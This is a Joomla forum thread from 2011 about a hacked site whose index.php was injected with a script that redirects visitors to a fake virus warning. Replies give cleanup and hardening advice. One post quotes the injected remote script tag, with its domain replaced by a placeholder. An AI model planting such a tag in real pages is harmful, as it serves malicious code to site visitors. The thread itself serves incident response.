Joomla 1.5.22 site hacked

Discussion regarding Joomla! 1.5 security issues.
Joomla! Vulnerable Extensions: http://feeds.joomla.org/JoomlaSecurityV ... Extensions

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
Locked
Dougj
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 114
Joined: Fri Mar 06, 2009 1:11 am

Joomla 1.5.22 site hacked

Post by Dougj » Thu Apr 21, 2011 4:23 pm

one of my sites was hacked this morning. Its an advanced hack. Somehow they have injected a DB script that causes a redirect to a known malicious site.

The sites home page loads and then is redirected to a popup indicating a virus has been found and when you click on OK on that popup (no other options available. Can't even right click the popup to close it) you are sent to othersite.com" which shows your system as infected. However a second load of the webpage never shows the vulnerability again.

The code injects a script in the root index.php file at the very first line. Once removed from the index.php file the issue clears (once server cache is cleared)

On first visit the page source shows the following near the bottom of the page

<script src="http://othersite.com/n1.php?p=1">

There seems to be very little in the forums about this other than the fact that it has been affecting Joomla sites for several weeks now. Does anyone have any further information, such as how this script gets embeeded??


Thanks D.
Last edited by mandville on Thu Apr 21, 2011 5:07 pm, edited 2 times in total.
Reason: removed domain to prevent infection. putting an infecting domain into a post is irresponsible and dangerous

User avatar
219jondn
Joomla! Guru
Joomla! Guru
Posts: 640
Joined: Sat Jun 26, 2010 9:15 pm
Location: Charlotte, NC, USA | Köln, NRW, DE

Re: Joomla 1.5.22 site hacked by globalpoweringgathering

Post by 219jondn » Thu Apr 21, 2011 4:33 pm

Unfortunately I don't have more information about it, but this sounds like something that needs to get to the Security lists so that the experts there can jump on it. Here's a link to the 1.5 Security Forum http://forum.joomla.org/viewforum.php?f=432
Respectfully,
Jon Neubauer
Tweet at me @219jondn

Dougj
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 114
Joined: Fri Mar 06, 2009 1:11 am

Re: Joomla 1.5.22 site hacked by globalpoweringgathering

Post by Dougj » Thu Apr 21, 2011 4:46 pm

am i missing something or did I not already post this in the security forum?

D.

User avatar
219jondn
Joomla! Guru
Joomla! Guru
Posts: 640
Joined: Sat Jun 26, 2010 9:15 pm
Location: Charlotte, NC, USA | Köln, NRW, DE

Re: Joomla 1.5.22 site hacked by globalpoweringgathering

Post by 219jondn » Thu Apr 21, 2011 4:48 pm

wow - am I not paying attention today or what :) - sorry about that - you're one step ahead :)
Respectfully,
Jon Neubauer
Tweet at me @219jondn

Dougj
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 114
Joined: Fri Mar 06, 2009 1:11 am

Re: Joomla 1.5.22 site hacked by globalpoweringgathering

Post by Dougj » Thu Apr 21, 2011 4:54 pm

lol...no worries ;)

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 14820
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Joomla 1.5.22 site hacked

Post by mandville » Thu Apr 21, 2011 5:09 pm

an askgooglebing search would have provided loads of warnings about that site and its actions

It would help us to help you if before you post your security/been hacked topic

Tell us if you have done the following, try copy and paste to use as a posting guide if needed

[ ] Did you use the forum http://forum.joomla.org/search.php search box for a similar error?

[ ] Run the forum post assistant and security tool Instructions available here

[ ] Ensure you have the latest version of Joomla. Delete all files in your Joomla installation. Replace the deleted files with fresh copies of a current full version of Joomla, and fresh copies of extensions and templates used. Only by replacing all files in the installation (including extensions and templates) can you be sure to remove the backdoors inserted and hidden in files and directories

[ ] Review Vulnerable Extensions List

[ ] Review and action Security Checklist checklist 7 to make sure you've gone through all of the steps.

[ ] Scan all machines with FTP, Joomla super admin, and Joomla admin access for malware, virus, trojans, spyware, etc.

[ ] Change all passwords and if possible user names for the website host control panel and your Joomla site.

[ ] Use proper permissions on files and directories. They should never be 777, but ideal is 644 and 755

[ ] Check your htaccess for for any odd code (i.e. code which is not in the standard htaccess supplied as part of the Joomla installation).

[ ] Check the crontab or Task Scheduler for unexpected jobs/tasks.

If you feel none of the above applies to you read these admin tips and the what went wrong post
What happened when Google visited this site?

Of the 26 pages we tested on the site over the past 90 days, 0 page (s) contained (n) resulted in malicious software being downloaded and installed without user consent. Google visited this site was last 21/04/2011, and suspicious content was found on this site was last 21/04/2011.

Malicious software includes 26 scripting exploit (s).

This site hosted on 1 WAS network (s) including AS25190 (KIS) .

Has this site acted as an intermediary resulting in further distribution of malware?

During the past 90 days, it seems that globalpoweringgathering;com function as an intermediary for the infection of 66 site (s), among which are included theoctopusproject;com / , jamesalt;com / , acro-china;com / .

Has this site hosted malware?

Yes, the site has hosted malicious software over the past 90 days. Infected 1238 domain (s), among which are included clonestop;com / , warseer;com / , showbiz411;com /
.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

Dougj
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 114
Joined: Fri Mar 06, 2009 1:11 am

Re: Joomla 1.5.22 site hacked

Post by Dougj » Fri Apr 22, 2011 1:18 pm

Well I am not sure if your response was intented to be terse or not, but it reads that way to me. My only question was if anyone had discovered the source (app or whatever) of this issue.

Anyways it may just be the way I read it

Yes I went thru that Joomla page before contacting this forum and considered all those items. I find none of my extensions on the vulnerability list and when I searched the Joomla search box for that location I continually got a message that the words "globalpoweringgathering" and "global" "powering" and "gathering" were too common and had been stripped from the search phrase. That made that search of little consequence. While searching google, as i already stated, several of us came up with little that actually helped find the root cause of the infection.

We have cleaned and rebuilt the site with new code ompletely and so far no issues. However we are still using 1.5.22 as the move at this point is too cumbersome for the customers needs.
All directories and files have correct permissions, paswords have all been changed and are regularily and we find no logs indicating any issues.

I also notice you stripped the name of the exploit from my subject. That was put there in the first place on purpose to increase the search results for the next person trying to find info on this??? Not sure why you changed that??

d.
D.

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 14820
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Joomla 1.5.22 site hacked

Post by mandville » Fri Apr 22, 2011 6:15 pm

my post was the standard copy and paste from http://forum.joomla.org/viewtopic.php?p ... 3#p2480983 to cover a multitiude of scenarios.

the information i provided on it was confirmation it was malicious, and none of the links were clickable to prevent people from following it and getting infected (which some WILL do!)

The fact is you were hacked, your host was hacked or you had your ftp credentials used. how that happened is not know, and for others with a similar situation on next weeks othersite.com a help to resolve it.

The script actually infected not just joomla sites,
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

sucuri
Joomla! Apprentice
Joomla! Apprentice
Posts: 13
Joined: Tue Mar 30, 2010 5:20 pm
Contact:

Re: Joomla 1.5.22 site hacked

Post by sucuri » Mon Apr 25, 2011 1:30 pm

Note that this infection you mentioned is not specific to Joomla. We first saw it on WordPress sites and now we are seeing on Joomla too. In fact, the first time it happened, it was due to a Godaddy mass infection on their shared hosts...

As far as the infection, it comes in two ways (when not caused by a shared server compromise):

1-Through vulnerable web applications (are you using old versions of Joomla or WordPress)
2-Stolen passwords.

And it doesn't matter if your site is updated now (after the fact). Because the attackers probably left backdoors and even if you just upgraded your site, they can come back easily. Same thing for passwords... If your desktop is infected with a virus, it can be easily stolen too (no matter how many times you change it).

So, update your sites, change your passwords, clean up your desktops, remove backdoors, use strong passwords, follow mandville recommendations (IMPORTANT) and you should be good.


Locked

Return to “Security in Joomla! 1.5”